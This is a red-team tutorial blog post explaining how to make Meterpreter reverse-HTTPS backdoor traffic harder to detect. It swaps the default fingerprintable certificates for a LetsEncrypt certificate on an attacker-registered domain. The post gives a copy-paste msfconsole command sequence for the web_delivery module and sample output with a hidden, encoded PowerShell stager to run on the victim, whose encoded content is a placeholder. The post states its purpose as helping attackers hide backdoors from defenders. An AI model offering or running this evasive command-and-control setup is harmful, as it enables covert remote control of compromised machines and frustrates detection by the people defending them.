RED TEAM TUTORIALS — №1

Encrypting Meterpreter traffic

Photo by Markus Winkler via Unsplash.com

TOPICS

  1. Register a domain
  2. Letsencrypt
  3. Meterpreter Magic

STOP USING DEFAULT SSL CERTIFICATES

By default, Meterpreter creates custom SSL certificates to encrypt traffic between the target and your C2 server if you turn on SSL. However, these custom SSL certificates contain fingerprintable data that enables Hunters to easily detect your backdoor.

Obviously, with SSL Termination (or SSL offloading), Hunters would be able to read and interpret the data stream, but this technique is computationally intensive work and therefore — most of the time — requires a separate device. Anyway, at the time of writing, SSL Termination is not used very often because of the costs involved or immaturity of the organization.

Back to Meterpreter.

1. Register a domain

First, register a domain for your C2 server or create a subdomain on an existing domain. This is not only a mandatory step for a valid SSL certificate, but it also allows you to move your C2 infrastructure to another hosting company or IP address. With just one DNS update, all of your backdoors will be able to find your C2 server.

2. Use LetsEncrypt to create an SSL certificate

To avoid detection because of fingerprintable SSL certificates, you should create your own custom SSL certificates. Luckily, that’s where LetsEncrypt comes in. A nonprofit Certificate Authority providing TLS certificates to 260 million websites for free (!).

  • Go to certbot.eff.org
  • For software, choose None of the above
  • For system, choose your OS. In my case: Ubuntu 20.04
  • Follow the instructions to install Certbot on your C2 server
  • Then, request a certificate using the --standalone option:
    # certbot certonly --standalone -d YOURDOMAINHERE
  • If everything went okay, your certificate should be in this directory: /etc/letsencrypt/live/YOURDOMAINHERE

To make this brand new certificate ready for Meterpreter, we need to merge the certificate with its private key.

  • Create a directory to save the custom certificate in:
    # mkdir /opt/ssl
  • Concatenate the LetsEncrypt certificate and private key:
# cat /etc/letsencrypt/live/YOURDOMAINHERE/privkey.pem /etc/letsencrypt/live/YOURDOMAINHERE/fullchain.pem > /opt/ssl/unified.pem

SIDENOTE

You could increase your OpSec by using Cloudflare instead of LetsEncrypt. The downside is that you can only use WEB ports for your C2 connections because Cloudflare only forwards WEB traffic to your IP address.

3. Meterpreter Magic

Okay, now that you’ve set up all the preliminaries, we can finally get into Meterpreter. For this example, I am going to use Meterpreter module exploit/multi/script/web_delivery and payload windows/x64/meterpreter/reverse_https. Example:

Meterpreter example by Crypt0jan

In the image above, you’ll see SSL options in the ‘Module’ section but none in the ‘Payload’ section. Now, if you’re somewhat familiar with Meterpreter, you know that there are some ‘advanced’ options. One particularly important option to avoid detection is HandlerSSLCert. This option will override the default (automagically generated, fingerprintable SSL certificate) by setting your own SSL certificate for the 'stager'.

Don’t forget to enable checking of this certificate by setting stagerverifysslcert to true.

Okay, here are the commands if you’re looking for a copy/paste:

use exploit/multi/script/web_delivery
set payload windows/x64/meterpreter/reverse_https
set sslcert /opt/ssl/unified.pem
set ssl true
set srvport 80
set lhost YOURDOMAINHERE
set lport 443
set HandlerSSLCert /opt/ssl/unified.pem
set StagerVerifySSLCert true
set target 2
exploit -j -z

Notice that it looks like I set the same certificate twice. That’s correct. One time for the listener and one time to be used by the stager connection.

After running the last command (exploit -j -z), you'll get the Powershell command to run on the target machine:

[*] Exploit running as background job 1.
[*] Exploit completed, but no session was created.
[*] Started HTTPS reverse handler on https://0.0.0.0:443
[*] Using URL: https://0.0.0.0:80/RaNdOmStRiNg
[*] Local IP: https://0.0.0.0:80/RaNdOmStRiNg
[*] Server started.
[*] Run the following command on the target machine:
powershell.exe -nop -w hidden -e VGhpcyBpcyBqdXN0IGFuIGV4YW1wbGUuIFRoaXMgaXMganVzdCBhbiBleGFtcGxlLiBUaGlzIGlzIGp1c3QgYW4gZXhhbXBsZS4gVGhpcyBpcyBqdXN0IGFuIGV4YW1wbGUuIFRoaXMgaXMganVzdCBhbiBleGFtcGxlLiBUaGlzIGlzIGp1c3QgYW4gZXhhbXBsZS4gVGhpcyBpcyBqdXN0IGFuIGV4YW1wbGUuIFRoaXMgaXMganVzdCBhbiBleGFtcGxlLiBUaGlzIGlzIGp1c3QgYW4gZXhhbXBsZS4gVGhpcyBpcyBqdXN0IGFuIGV4YW1wbGUuIFRoaXMgaXMganVzdCBhbiBleGFtcGxlLiBUaGlzIGlzIGp1c3QgYW4gZXhhbXBsZS4gVGhpcyBpcyBqdXN0IGFuIGV4YW1wbGUuIFRoaXMgaXMganVzdCBhbiBleGFtcGxlLiBUaGlzIGlzIGp1c3QgYW4gZXhhbXBsZS4gVGhpcyBpcyBqdXN0IGFuIGV4YW1wbGUuIFRoaXMgaXMganVzdCBhbiBleGFtcGxlLiA=

Now, open your browser and go to https://YOURDOMAINHERE:443. The SSL connection will be valid and it will show the LetsEncrypt certificate you set up.

Good job!

RED TEAM TUTORIALS

With the ongoing shift from Red Teaming to Purple Teaming, Hunters (or: Blue Teamers) are becoming smarter in spotting and countering attacks from Hackers. The reason? Hackers and Hunters are finally learning from each other.

This tutorial is one of a few, written for Hackers to better hide your backdoors from Hunters. Check out my Medium page for more Red Team tutorials.

--

--

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store